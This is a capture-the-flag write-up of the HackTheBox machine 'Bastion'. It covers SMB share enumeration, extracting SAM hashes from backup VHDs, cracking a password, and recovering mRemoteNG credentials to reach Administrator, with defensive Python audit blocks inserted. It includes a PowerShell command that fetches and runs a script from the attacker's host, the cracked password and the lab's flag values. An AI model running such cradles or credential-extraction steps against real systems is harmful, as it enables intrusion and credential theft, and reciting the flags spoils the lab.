Bastion – 10.10.10.134

Nmap scan:

# Nmap 7.70 scan initiated Sun Apr 28 10:49:12 2019 as: nmap -A -oN nmap.txt 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.041s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 (RSA)
|   256 (ECDSA)
|_  256 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -48m55s, deviation: 1h09m13s, median: -8m58s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|_  Workgroup: WORKGROUP\x00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|_  date: 2019-04-28

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   40.98 ms 10.10.14.1
2   41.65 ms 10.10.10.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 28 2019 -- 1 IP address (1 host up) scanned in 63.23 seconds

Since it's a Windows box, it seems best to start by taking a look at it from a Windows PC too.

Install OpenVPN on Windows and import the .ovpn config file from HTB.

Connect, and now we can reach the Bastion box:

(c) 2018 Microsoft Corporation. All rights reserved.

> ping 10.10.10.134

Pinging 10.10.10.134 with 32 bytes of data:
Reply from 10.10.10.134: bytes=32 time=65ms TTL=127
Reply from 10.10.10.134: bytes=32 time=34ms TTL=127
Reply from 10.10.10.134: bytes=32 time=32ms TTL=127
Reply from 10.10.10.134: bytes=32 time=33ms TTL=127

Ping statistics for 10.10.10.134:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 32ms, Maximum = 65ms, Average = 41ms

Connect through File Explorer to find shares:

\\10.10.10.134

Found a Backups share.

There are 2 VHD files in it; let's look through them with 7-Zip.

\\10.10.10.134\Backups\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351

Two VHD files (names starting 9b9cfbc3-369e-11e9-a1, cut off in the listing), modified 2/22/2019 at 1:44 PM and 1:45 PM; the only size legible in the screenshot is 3606 KB.

The second one is the larger, and inside it we can see a Windows directory tree.

Got the SAM file… and the SYSTEM file.

Using samdump2 to extract what's needed:

samdump2 SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

Crack the hash

john --show --format=LM L4mpje.hash
L4mpje::1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

john --show --format=NT L4mpje.hash
L4mpje:bureaulampje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

1 password hash cracked, 0 left
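The john step above tests the dumped NT hash against a wordlist. The following is an added example, not from this writeup, that does the same check from an auditor's side: it computes NT hashes with a small MD4 implementation (NT hashes are unsalted MD4 over the UTF-16-LE password), parses samdump2-style lines, flags blank NT hashes and stored LM hashes, and tests a list of candidate passwords against each account. The sample dump and candidate list are constructed here; the hash values are the ones printed above.

```python
import struct
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password (or LM storage off)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password, i.e. MD4("")

def md4(data: bytes) -> bytes:
    """Compact MD4 (RFC 1320); included because hashlib's md4 is often missing under OpenSSL 3."""
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(48):  # 3 rounds x 16 steps; each round has its own f, word order and shifts
            r = i // 16
            k = (i, (i % 4) * 4 + (i % 16) // 4, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i % 16])[r]
            s = ((3, 7, 11, 19), (3, 5, 9, 13), (3, 9, 11, 15))[r][i % 4]
            t = (a + (F, G, H)[r](b, c, d) + X[k] + (0, 0x5A827999, 0x6ED9EBA1)[r]) & 0xFFFFFFFF
            a, d, c, b = d, c, b, rot(t, s)  # register rotation between steps
        a, b, c, d = (a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF, (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16-LE password, unsalted: equal passwords give equal hashes."""
    return md4(password.encode("utf-16-le")).hex()

def audit_pwdump(dump: str, candidates=()) -> dict:
    """Parse user:rid:lm:nt::: lines (samdump2/pwdump layout) and flag blank NT hashes,
    stored LM hashes and any NT hash that equals the hash of a candidate password."""
    findings = {}
    for line in dump.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, lm, nt = parts[0], parts[2].lower(), parts[3].lower()
        flags = []
        if nt == EMPTY_NT:
            flags.append("blank NT hash (empty password; on a built-in account usually a disabled one)")
        if lm != EMPTY_LM:
            flags.append("LM hash stored (trivially crackable; disable LM hash storage by policy)")
        hit = next((p for p in candidates if nt_hash(p) == nt), None)
        if hit is not None:
            flags.append("NT hash matches candidate password: " + hit)
        findings[user] = {"rid": int(parts[1]), "flags": flags}
    return findings

# Constructed sample in the samdump2 layout; the hashes are the ones printed above.
SAMPLE_DUMP = """Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::"""
```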

Okay, we've got the password (bureaulampje); let's SSH our way in!

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\L4mpje\Desktop

22-02-2019  16:27    <DIR>          .
22-02-2019  16:27    <DIR>          ..
23-02-2019  10:07                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  11.299.796.032 bytes free

l4mpje@BASTION C:\Users\L4mpje\Desktop> type user.txt
9bfe57d5c3309db3a151772f9d86c6cd

ONTO ROOT:

Time to run some enumeration scripts now:

PowerUp.ps1

Jaws-enum.ps1

How to run them:

Tried downloading from my own apache2 server -> didn't work

Tried downloading from GitHub with curl -> didn't work

Tried running it straight from memory with PowerShell:

powershell -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.14/PowerUp.ps1');Invoke-AllChecks"

Check the results.

Looking for the odd program out, we find an application installed in the Program Files (x86) folder called mRemoteNG:

http://hackersvanguard.com/mremoteng-insecure-password-storage/

Looking for the passwords

l4mpje@BASTION C:\Users\L4mpje> ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

l4mpje@BASTION C:\Users\L4mpje> dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\L4mpje\AppData

                     <DIR>          Local
                     <DIR>          LocalLow
                     <DIR>          Roaming
               0 File(s)              0 bytes
               3 Dir(s)  11.294.584.832 bytes free

l4mpje@BASTION C:\Users\L4mpje> dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\L4mpje\AppData\Roaming

                     <DIR>          Adobe
                     <DIR>          mRemoteNG
               0 File(s)              0 bytes
               4 Dir(s)  11.294.580.730 bytes free

l4mpje@BASTION C:\Users\L4mpje> dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG

                     <DIR>          .
                     <DIR>          ..
                             6.316 confCons.xml
                             6.194 confCons.xml.20190222-14022773 (rest of the name cut off in the screenshot)

Found it: confCons.xml.

Let's try method 2 from the article to recover the password:

Method 2: Using an Offline Decoder
A modified version of the Metasploit module Ruby code can be used to get the clear text passwords from within a protected connections file. The file can be downloaded from packetstorm (https://packetstormsecurity.com/files/126309/mRemoteOffPwdsDecrypt.rb_txt) and run on Kali systems as such:
ruby mRemoteOffPwdsDecrypt.rb confCons.xml

Didn't work: the script is too old and doesn't apply to this version of mRemoteNG.

Let’s try method 1 then…

So I downloaded mRemoteNG from the website:

https://mremoteng.org/download

Installed it on my local Windows computer and ran it.

After that I took its confCons.xml file and replaced it with the one from the box.

Adapted the "Protected" value to the "blank hash" and ran it again.

With the trick shown in the URL, got the password of the admin account.

[https://pastebin.com/auZQVFuQ: if the file from the box doesn't work, take this one; the syntax errors are fixed.]
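The old packetstorm decoder fails because newer mRemoteNG releases changed the storage format: each Password attribute (and the root Protected value, the master-password check that the writeup above swaps out) is AES-GCM ciphertext under a key derived by PBKDF2 from the master password, and unless the user set a custom one that key comes from mRemoteNG's built-in default, so such files are effectively plaintext to anyone who can read them. As an added example, not from this writeup or the mRemoteNG project, the following parses a constructed confCons.xml, reports the crypto settings its root element declares, and lists which connections carry a stored credential, which is the check to run on any connection file found on a share. The sample XML and its base64 blobs are constructed here and are not real ciphertext.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed stand-in for an encrypted Password/Protected value: the stored form is
# base64(salt[16] | nonce[16] | ciphertext | gcm_tag[16]), so 60 bytes is a plausible size.
FAKE_BLOB = base64.b64encode(b"\x01" * 60).decode()

# Constructed sample in the confCons.xml layout (not the file from the box).
SAMPLE_CONFCONS = f"""<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections"
  Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
  FullFileEncryption="false" Protected="{FAKE_BLOB}" ConfVersion="2.6">
  <Node Name="DC-01" Type="Connection" Hostname="10.0.0.5" Username="Administrator"
    Domain="CORP" Protocol="RDP" Password="{FAKE_BLOB}" />
  <Node Name="jump" Type="Connection" Hostname="10.0.0.9" Username="ops"
    Protocol="SSH2" Password="" />
</mrng:Connections>"""

def audit_confcons(xml_text: str) -> dict:
    """Report how a confCons.xml protects its contents and which connections carry a
    stored password. With FullFileEncryption false only the Password and Protected
    values are encrypted; names, hosts, usernames and domains are plaintext."""
    root = ET.fromstring(xml_text)
    settings = {
        "engine": root.get("EncryptionEngine"),
        "mode": root.get("BlockCipherMode"),
        "kdf_iterations": int(root.get("KdfIterations") or 0),
        "full_file_encryption": (root.get("FullFileEncryption") or "false").lower() == "true",
        "has_protected_check": bool(root.get("Protected")),
        "conf_version": root.get("ConfVersion"),
    }
    stored = []
    for node in root.iter():
        if node.get("Type") != "Connection" or not node.get("Password"):
            continue
        blob = base64.b64decode(node.get("Password"))
        stored.append({
            "name": node.get("Name"), "host": node.get("Hostname"),
            "user": node.get("Username"), "protocol": node.get("Protocol"),
            # salt + nonce + tag alone take 48 bytes; anything shorter cannot be a valid blob
            "well_formed": len(blob) >= 48,
        })
    return {"settings": settings, "stored_credentials": stored}
```

Decrypting the listed blobs is a separate step that needs an AES-GCM library; this block only finds and validates them.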

With the password we can SSH into the machine as Administrator:

administrator@BASTION C:\Users\Administrator> dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\Administrator

25-04-2019  06:08    <DIR>          .
25-04-2019  06:08    <DIR>          ..
23-02-2019  10:40    <DIR>          Contacts
23-02-2019  10:40    <DIR>          Desktop
23-02-2019  10:40    <DIR>          Documents
23-02-2019  10:40    <DIR>          Downloads
23-02-2019  10:40    <DIR>          Favorites
23-02-2019  10:40    <DIR>          Links
23-02-2019  10:40    <DIR>          Music
23-02-2019  10:40    <DIR>          Pictures
23-02-2019  10:40    <DIR>          Saved Games
23-02-2019  10:40    <DIR>          Searches
23-02-2019  10:40    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  11.297.513.472 bytes free

administrator@BASTION C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\Administrator\Desktop

23-02-2019  10:40    <DIR>          .
23-02-2019  10:40    <DIR>          ..
23-02-2019  10:07                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  11.297.513.472 bytes free

administrator@BASTION C:\Users\Administrator\Desktop> type /root.txt
Invalid parameter - /root.txt

administrator@BASTION C:\Users\Administrator\Desktop> type root.txt
958850b91811676ed0620a9c430e65c8

GOT ROOT